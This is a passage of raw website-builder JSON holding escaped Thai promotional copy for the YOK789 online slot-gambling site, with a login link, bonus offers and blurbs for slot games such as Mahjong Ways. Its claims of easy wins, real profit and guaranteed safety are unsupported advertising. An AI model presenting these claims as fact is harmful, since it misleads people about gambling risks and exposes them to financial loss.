\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e22\\u0e2d\\u0e14\\u0e19\\u0e34\\u0e22\\u0e21\\u0e23\\u0e27\\u0e21\\u0e04\\u0e27\\u0e32\\u0e21\\u0e21\\u0e31\\u0e19\\u0e2a\\u0e4c\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e14\\u0e31\\u0e07\\u0e25\\u0e34\\u0e02\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e41\\u0e17\\u0e49\\u0e17\\u0e35\\u0e48\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e1a\\u0e32\\u0e22\\u0e17\\u0e38\\u0e01\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e23\\u0e2d\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e2a\\u0e32\\u0e22\\u0e17\\u0e38\\u0e19\\u0e19\\u0e49\\u0e2d\\u0e22 \\u0e40\\u0e23\\u0e34\\u0e48\\u0e21 1 \\u0e1a\\u0e32\\u0e17 \\u0e04\\u0e23\\u0e1a\\u0e17\\u0e38\\u0e01\\u0e04\\u0e48\\u0e32\\u0e22\\u0e40\\u0e01\\u0e21\\u0e14\\u0e31\\u0e07 \\u0e2d\\u0e31\\u0e1b\\u0e40\\u0e14\\u0e15\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e15\\u0e25\\u0e2d\\u0e14\\u0e40\\u0e27\\u0e25\\u0e32\\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e23\\u0e27\\u0e21\\u0e17\\u0e38\\u0e01\\u0e04\\u0e27\\u0e32\\u0e21\\u0e1a\\u0e31\\u0e19\\u0e40\\u0e17\\u0e34\\u0e07\\u0e44\\u0e27\\u0e49\\u0e04\\u0e23\\u0e1a\\u0e43\\u0e19\\u0e17\\u0e35\\u0e48\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27\\u0e44\\u0e21\\u0e48\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e2a\\u0e32\\u0e22\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e2a\\u0e32\\u0e22\\u0e17\\u0e33\\u0e01\\u0e33\\u0e44\\u0e23\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e21\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e07\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e15\\u0e49\\u0e19\\u0e01\\u0e47\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e40\\u0e02\\u0e49\\u0e32\\u0e16\\u0e36\\u0e07\\u0e44\\u0e14\\u0e49\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e16\\u0e39\\u0e01\\u0e2d\\u0e2d\\u0e01\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e32\\u0e43\\u0e2b\\u0e49\\u0e43\\u0e0a\\u0e49\\u0e07\\u0e32\\u0e19\\u0e2a\\u0e30\\u0e14\\u0e27\\u0e01\\u0e20\\u0e32\\u0e1e\\u0e25\\u0e37\\u0e48\\u0e19\\u0e44\\u0e2b\\u0e25\\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e2a\\u0e30\\u0e14\\u0e38\\u0e14 \\u0e23\\u0e2d\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e17\\u0e31\\u0e49\\u0e07\\u0e21\\u0e37\\u0e2d\\u0e16\\u0e37\\u0e2d\\u0e41\\u0e25\\u0e30\\u0e04\\u0e2d\\u0e21\\u0e1e\\u0e34\\u0e27\\u0e40\\u0e15\\u0e2d\\u0e23\\u0e4c\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e21\\u0e32\\u0e15\\u0e23\\u0e10\\u0e32\\u0e19\\u0e04\\u0e27\\u0e32\\u0e21\\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22\\u0e23\\u0e30\\u0e14\\u0e31\\u0e1a\\u0e2a\\u0e32\\u0e01\\u0e25 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e21\\u0e31\\u0e48\\u0e19\\u0e43\\u0e08\\u0e44\\u0e14\\u0e49\\u0e27\\u0e48\\u0e32\\u0e40\\u0e07\\u0e34\\u0e19\\u0e17\\u0e38\\u0e19\\u0e41\\u0e25\\u0e30\\u0e02\\u0e49\\u0e2d\\u0e21\\u0e39\\u0e25\\u0e2a\\u0e48\\u0e27\\u0e19\\u0e15\\u0e31\\u0e27\\u0e44\\u0e14\\u0e49\\u0e23\\u0e31\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e14\\u0e39\\u0e41\\u0e25\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e14\\u0e35 \\u0e40\\u0e21\\u0e37\\u0e48\\u0e2d\\u0e23\\u0e27\\u0e21\\u0e01\\u0e31\\u0e1a\\u0e08\\u0e38\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e15\\u0e49\\u0e19\\u0e40\\u0e1e\\u0e35\\u0e22\\u0e07 1 \\u0e1a\\u0e32\\u0e17 \\u0e22\\u0e34\\u0e48\\u0e07\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e41\\u0e1e\\u0e25\\u0e15\\u0e1f\\u0e2d\\u0e23\\u0e4c\\u0e21\\u0e19\\u0e35\\u0e49\\u0e01\\u0e25\\u0e32\\u0e22\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e1e\\u0e37\\u0e49\\u0e19\\u0e17\\u0e35\\u0e48\\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e01\\u0e21\\u0e17\\u0e35\\u0e48\\u0e40\\u0e02\\u0e49\\u0e32\\u0e16\\u0e36\\u0e07\\u0e44\\u0e14\\u0e49\\u0e08\\u0e23\\u0e34\\u0e07<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"d34d1e8\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e04\\u0e27\\u0e32\\u0e21\\u0e19\\u0e48\\u0e32\\u0e2a\\u0e19\\u0e43\\u0e08\\u0e02\\u0e2d\\u0e07\\u0e01\\u0e32\\u0e23\\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23 YOK789 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e41\\u0e15\\u0e01\\u0e07\\u0e48\\u0e32\\u0e22 \",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"07fc632\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e04\\u0e27\\u0e32\\u0e21\\u0e1b\\u0e31\\u0e07\\u0e02\\u0e2d\\u0e07\\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e44\\u0e21\\u0e48\\u0e44\\u0e14\\u0e49\\u0e21\\u0e35\\u0e41\\u0e04\\u0e48\\u0e40\\u0e01\\u0e21\\u0e41\\u0e15\\u0e01\\u0e07\\u0e48\\u0e32\\u0e22\\u0e41\\u0e15\\u0e48\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e15\\u0e31\\u0e49\\u0e07\\u0e41\\u0e15\\u0e48\\u0e02\\u0e31\\u0e49\\u0e19\\u0e15\\u0e2d\\u0e19\\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23\\u0e17\\u0e35\\u0e48\\u0e42\\u0e04\\u0e15\\u0e23\\u0e44\\u0e27 \\u0e01\\u0e23\\u0e2d\\u0e01\\u0e02\\u0e49\\u0e2d\\u0e21\\u0e39\\u0e25\\u0e44\\u0e21\\u0e48\\u0e01\\u0e35\\u0e48\\u0e02\\u0e31\\u0e49\\u0e19\\u0e01\\u0e47\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e25\\u0e38\\u0e22 \\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e04\\u0e27\\u0e32\\u0e21\\u0e22\\u0e38\\u0e48\\u0e07\\u0e22\\u0e32\\u0e01\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e2d\\u0e32\\u0e23\\u0e21\\u0e13\\u0e4c \\u0e23\\u0e2d\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e17\\u0e31\\u0e49\\u0e07\\u0e21\\u0e37\\u0e2d\\u0e16\\u0e37\\u0e2d\\u0e41\\u0e25\\u0e30\\u0e04\\u0e2d\\u0e21 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e14\\u0e49\\u0e17\\u0e38\\u0e01\\u0e17\\u0e35\\u0e48\\u0e17\\u0e38\\u0e01\\u0e40\\u0e27\\u0e25\\u0e32 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e04\\u0e27\\u0e32\\u0e21\\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22\\u0e41\\u0e19\\u0e48\\u0e19\\u0e2b\\u0e19\\u0e32 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e21\\u0e31\\u0e48\\u0e19\\u0e43\\u0e08\\u0e44\\u0e14\\u0e49\\u0e27\\u0e48\\u0e32\\u0e02\\u0e49\\u0e2d\\u0e21\\u0e39\\u0e25\\u0e41\\u0e25\\u0e30\\u0e18\\u0e38\\u0e23\\u0e01\\u0e23\\u0e23\\u0e21\\u0e16\\u0e39\\u0e01\\u0e14\\u0e39\\u0e41\\u0e25\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e14\\u0e35 \\u0e17\\u0e35\\u0e48\\u0e2a\\u0e33\\u0e04\\u0e31\\u0e0d\\u0e04\\u0e37\\u0e2d\\u0e21\\u0e35\\u0e17\\u0e35\\u0e21\\u0e14\\u0e39\\u0e41\\u0e25\\u0e15\\u0e25\\u0e2d\\u0e14\\u0e40\\u0e27\\u0e25\\u0e32 \\u0e04\\u0e2d\\u0e22\\u0e0b\\u0e31\\u0e1e\\u0e1e\\u0e2d\\u0e23\\u0e4c\\u0e15\\u0e40\\u0e21\\u0e37\\u0e48\\u0e2d\\u0e21\\u0e35\\u0e04\\u0e33\\u0e16\\u0e32\\u0e21\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e1b\\u0e31\\u0e0d\\u0e2b\\u0e32\\u0e40\\u0e01\\u0e34\\u0e14\\u0e02\\u0e36\\u0e49\\u0e19 <\\/span><a href=\\\"https:\\/\\/luca333auto.com\\/\\\"><b>\\u0e40\\u0e02\\u0e49\\u0e32\\u0e2a\\u0e39\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e1a<\\/b><\\/a><span style=\\\"font-weight: 400;\\\"> \\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e08\\u0e38\\u0e14\\u0e41\\u0e02\\u0e47\\u0e07\\u0e2d\\u0e35\\u0e01\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e04\\u0e37\\u0e2d\\u0e01\\u0e32\\u0e23\\u0e2d\\u0e31\\u0e1b\\u0e40\\u0e14\\u0e15\\u0e40\\u0e01\\u0e21\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e2a\\u0e21\\u0e48\\u0e33\\u0e40\\u0e2a\\u0e21\\u0e2d \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e44\\u0e21\\u0e48\\u0e23\\u0e39\\u0e49\\u0e2a\\u0e36\\u0e01\\u0e08\\u0e33\\u0e40\\u0e08 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e21\\u0e37\\u0e48\\u0e2d\\u0e44\\u0e23\\u0e01\\u0e47\\u0e21\\u0e35\\u0e2d\\u0e30\\u0e44\\u0e23\\u0e2a\\u0e14\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e43\\u0e2b\\u0e49\\u0e25\\u0e2d\\u0e07 \\u0e43\\u0e04\\u0e23\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e1b\\u0e23\\u0e30\\u0e2a\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e13\\u0e4c\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e31\\u0e19\\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21\\u0e41\\u0e25\\u0e30\\u0e21\\u0e35\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e17\\u0e33\\u0e01\\u0e33\\u0e44\\u0e23\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e01\\u0e32\\u0e23\\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23\\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e04\\u0e37\\u0e2d\\u0e01\\u0e49\\u0e32\\u0e27\\u0e41\\u0e23\\u0e01\\u0e2a\\u0e39\\u0e48\\u0e40\\u0e2a\\u0e49\\u0e19\\u0e17\\u0e32\\u0e07\\u0e2a\\u0e32\\u0e22\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e17\\u0e35\\u0e48\\u0e44\\u0e21\\u0e48\\u0e18\\u0e23\\u0e23\\u0e21\\u0e14\\u0e32<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e9ff89c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Character-1-.webp\",\"id\":294,\"size\":\"\",\"alt\":\"yok789\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"8b749b2\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e1a\\u0e2d\\u0e01\\u0e15\\u0e48\\u0e2d\\u0e17\\u0e32\\u0e07\\u0e40\\u0e02\\u0e49\\u0e32\\u0e01\\u0e32\\u0e23\\u0e17\\u0e33\\u0e40\\u0e07\\u0e34\\u0e19 \\u0e17\\u0e32\\u0e07\\u0e40\\u0e02\\u0e49\\u0e32 YOK \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e41\\u0e08\\u0e01\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a \\u0e1b\\u0e31\\u0e19 \\u0e42\\u0e1b\\u0e23 \\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a455b44\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e43\\u0e04\\u0e23\\u0e01\\u0e33\\u0e25\\u0e31\\u0e07\\u0e2a\\u0e48\\u0e2d\\u0e07\\u0e0a\\u0e48\\u0e2d\\u0e07\\u0e17\\u0e32\\u0e07\\u0e17\\u0e33\\u0e40\\u0e07\\u0e34\\u0e19\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e23\\u0e2d\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e0a\\u0e35\\u0e27\\u0e34\\u0e15 \\u0e15\\u0e49\\u0e2d\\u0e07\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e02\\u0e49\\u0e32\\u0e21\\u0e32\\u0e40\\u0e0a\\u0e47\\u0e01\\u0e2d\\u0e34\\u0e19\\u0e01\\u0e31\\u0e1a\\u0e40\\u0e23\\u0e32 \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e02\\u0e36\\u0e49\\u0e19\\u0e0a\\u0e37\\u0e48\\u0e2d\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e41\\u0e08\\u0e01\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e41\\u0e1a\\u0e1a\\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21 \\u0e42\\u0e1b\\u0e23\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e21\\u0e32\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e01\\u0e31\\u0e4a\\u0e01 \\u0e17\\u0e31\\u0e49\\u0e07\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e15\\u0e49\\u0e2d\\u0e19\\u0e23\\u0e31\\u0e1a \\u0e42\\u0e1b\\u0e23\\u0e1d\\u0e32\\u0e01\\u0e04\\u0e38\\u0e49\\u0e21 \\u0e41\\u0e25\\u0e30\\u0e01\\u0e34\\u0e08\\u0e01\\u0e23\\u0e23\\u0e21\\u0e25\\u0e38\\u0e49\\u0e19\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e31\\u0e1b\\u0e40\\u0e14\\u0e15\\u0e15\\u0e25\\u0e2d\\u0e14 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e1d\\u0e32\\u0e01\\u0e21\\u0e35\\u0e21\\u0e39\\u0e25\\u0e04\\u0e48\\u0e32\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e21\\u0e32\\u0e01\\u0e01\\u0e27\\u0e48\\u0e32\\u0e17\\u0e35\\u0e48\\u0e04\\u0e34\\u0e14 \\u0e04\\u0e27\\u0e32\\u0e21\\u0e40\\u0e1f\\u0e35\\u0e49\\u0e22\\u0e27\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e15\\u0e23\\u0e07\\u0e17\\u0e35\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e04\\u0e33\\u0e19\\u0e27\\u0e13\\u0e2d\\u0e31\\u0e15\\u0e42\\u0e19\\u0e21\\u0e31\\u0e15\\u0e34 <strong>\\u0e1b\\u0e31\\u0e19 \\u0e42\\u0e1b\\u0e23 \\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15<\\/strong> \\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e07\\u0e48\\u0e32\\u0e22\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e17\\u0e31\\u0e01\\u0e41\\u0e0a\\u0e15\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e40\\u0e27\\u0e25\\u0e32 \\u0e41\\u0e04\\u0e48\\u0e40\\u0e02\\u0e49\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e01\\u0e47\\u0e21\\u0e35\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e23\\u0e31\\u0e1a\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e41\\u0e1a\\u0e1a\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07 \\u0e1a\\u0e2d\\u0e01\\u0e40\\u0e25\\u0e22\\u0e27\\u0e48\\u0e32\\u0e2a\\u0e32\\u0e22\\u0e25\\u0e48\\u0e32\\u0e01\\u0e33\\u0e44\\u0e23\\u0e08\\u0e30\\u0e23\\u0e39\\u0e49\\u0e2a\\u0e36\\u0e01\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e44\\u0e14\\u0e49\\u0e15\\u0e31\\u0e27\\u0e0a\\u0e48\\u0e27\\u0e22\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e1e\\u0e25\\u0e31\\u0e07\\u0e17\\u0e38\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e17\\u0e35\\u0e48\\u0e2b\\u0e21\\u0e38\\u0e19 \\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e2b\\u0e25\\u0e32\\u0e01\\u0e2b\\u0e25\\u0e32\\u0e22\\u0e04\\u0e48\\u0e32\\u0e22\\u0e14\\u0e31\\u0e07\\u0e23\\u0e27\\u0e21\\u0e44\\u0e27\\u0e49\\u0e04\\u0e23\\u0e1a \\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21\\u0e17\\u0e31\\u0e49\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e41\\u0e25\\u0e30\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e17\\u0e33\\u0e22\\u0e2d\\u0e14\\u0e43\\u0e2b\\u0e49\\u0e1e\\u0e38\\u0e48\\u0e07\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e25\\u0e38\\u0e49\\u0e19\\u0e40\\u0e2b\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e22<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"933afcf\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3><span style=\\\"color: #99cc00;\\\"><b>\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 Mahjong Ways<\\/b><\\/span><\\/h3><p><span style=\\\"font-weight: 400;\\\">Mahjong Ways \\u0e04\\u0e37\\u0e2d\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e18\\u0e35\\u0e21\\u0e44\\u0e1e\\u0e48\\u0e19\\u0e01\\u0e01\\u0e23\\u0e30\\u0e08\\u0e2d\\u0e01\\u0e17\\u0e35\\u0e48\\u0e21\\u0e32\\u0e41\\u0e23\\u0e07\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e15\\u0e01\\u0e01\\u0e23\\u0e30\\u0e41\\u0e2a \\u0e08\\u0e38\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e17\\u0e35\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e0a\\u0e19\\u0e30\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e17\\u0e35\\u0e48\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e40\\u0e23\\u0e35\\u0e22\\u0e07\\u0e2a\\u0e31\\u0e0d\\u0e25\\u0e31\\u0e01\\u0e29\\u0e13\\u0e4c\\u0e21\\u0e35\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e44\\u0e2b\\u0e25\\u0e22\\u0e32\\u0e27\\u0e41\\u0e1a\\u0e1a\\u0e04\\u0e2d\\u0e21\\u0e42\\u0e1a \\u0e20\\u0e32\\u0e1e\\u0e01\\u0e23\\u0e32\\u0e1f\\u0e34\\u0e01\\u0e2a\\u0e44\\u0e15\\u0e25\\u0e4c\\u0e08\\u0e35\\u0e19\\u0e42\\u0e1a\\u0e23\\u0e32\\u0e13\\u0e14\\u0e39\\u0e41\\u0e1e\\u0e07\\u0e41\\u0e15\\u0e48\\u0e40\\u0e25\\u0e48\\u0e19\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e40\\u0e01\\u0e21\\u0e44\\u0e21\\u0e48\\u0e40\\u0e23\\u0e47\\u0e27\\u0e40\\u0e01\\u0e34\\u0e19\\u0e44\\u0e1b\\u0e08\\u0e36\\u0e07\\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e01\\u0e31\\u0e1a\\u0e2a\\u0e32\\u0e22\\u0e27\\u0e32\\u0e07\\u0e41\\u0e1c\\u0e19\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e2d\\u0e1a\\u0e14\\u0e39\\u0e17\\u0e23\\u0e07\\u0e01\\u0e48\\u0e2d\\u0e19\\u0e40\\u0e23\\u0e48\\u0e07\\u0e23\\u0e2d\\u0e1a \\u0e04\\u0e27\\u0e32\\u0e21\\u0e40\\u0e1f\\u0e35\\u0e49\\u0e22\\u0e27\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e01\\u0e21\\u0e19\\u0e35\\u0e49\\u0e04\\u0e37\\u0e2d\\u0e1f\\u0e35\\u0e40\\u0e08\\u0e2d\\u0e23\\u0e4c\\u0e15\\u0e31\\u0e27\\u0e04\\u0e39\\u0e13\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e02\\u0e36\\u0e49\\u0e19\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e22 \\u0e46 \\u0e40\\u0e21\\u0e37\\u0e48\\u0e2d\\u0e0a\\u0e19\\u0e30\\u0e15\\u0e34\\u0e14\\u0e01\\u0e31\\u0e19 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e01\\u0e33\\u0e44\\u0e23\\u0e1e\\u0e38\\u0e48\\u0e07\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e17\\u0e31\\u0e19\\u0e15\\u0e31\\u0e49\\u0e07\\u0e15\\u0e31\\u0e27 \\u0e43\\u0e04\\u0e23\\u0e0a\\u0e2d\\u0e1a\\u0e1f\\u0e35\\u0e25\\u0e04\\u0e48\\u0e2d\\u0e22 \\u0e46 \\u0e2a\\u0e30\\u0e2a\\u0e21\\u0e04\\u0e27\\u0e32\\u0e21\\u0e44\\u0e14\\u0e49\\u0e40\\u0e1b\\u0e23\\u0e35\\u0e22\\u0e1a\\u0e41\\u0e25\\u0e49\\u0e27\\u0e1b\\u0e34\\u0e14\\u0e08\\u0e1a\\u0e14\\u0e49\\u0e27\\u0e22\\u0e23\\u0e2d\\u0e1a\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e2b\\u0e19\\u0e31\\u0e01 \\u0e46 \\u0e08\\u0e30\\u0e2d\\u0e34\\u0e19\\u0e01\\u0e31\\u0e1a\\u0e40\\u0e01\\u0e21\\u0e19\\u0e35\\u0e49\\u0e2a\\u0e38\\u0e14\\u0e17\\u0e32\\u0e07 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e1e\\u0e25\\u0e34\\u0e19\\u0e41\\u0e15\\u0e48\\u0e21\\u0e35\\u0e0a\\u0e31\\u0e49\\u0e19\\u0e40\\u0e0a\\u0e34\\u0e07 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e44\\u0e21\\u0e48\\u0e43\\u0e0a\\u0e48\\u0e41\\u0e04\\u0e48\\u0e25\\u0e38\\u0e49\\u0e19\\u0e42\\u0e0a\\u0e04\\u0e41\\u0e15\\u0e48\\u0e04\\u0e37\\u0e2d\\u0e01\\u0e32\\u0e23\\u0e2d\\u0e48\\u0e32\\u0e19\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e41\\u0e25\\u0e30\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e2a\\u0e1b\\u0e35\\u0e14\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e02\\u0e49\\u0e32\\u0e01\\u0e31\\u0e1a\\u0e2a\\u0e44\\u0e15\\u0e25\\u0e4c\\u0e15\\u0e31\\u0e27\\u0e40\\u0e2d\\u0e07<\\/span><\\/p><h3><span style=\\\"color: #99cc00;\\\"><b>\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 Treasures of Azte<\\/b><\\/span><\\/h3><p><span style=\\\"font-weight: 400;\\\">Treasures of Aztec \\u0e21\\u0e32\\u0e43\\u0e19\\u0e18\\u0e35\\u0e21\\u0e2d\\u0e32\\u0e23\\u0e22\\u0e18\\u0e23\\u0e23\\u0e21\\u0e25\\u0e36\\u0e01\\u0e25\\u0e31\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e40\\u0e15\\u0e47\\u0e21\\u0e44\\u0e1b\\u0e14\\u0e49\\u0e27\\u0e22\\u0e2a\\u0e35\\u0e17\\u0e2d\\u0e07\\u0e41\\u0e25\\u0e30\\u0e1e\\u0e25\\u0e31\\u0e07\\u0e41\\u0e2b\\u0e48\\u0e07\\u0e02\\u0e38\\u0e21\\u0e17\\u0e23\\u0e31\\u0e1e\\u0e22\\u0e4c 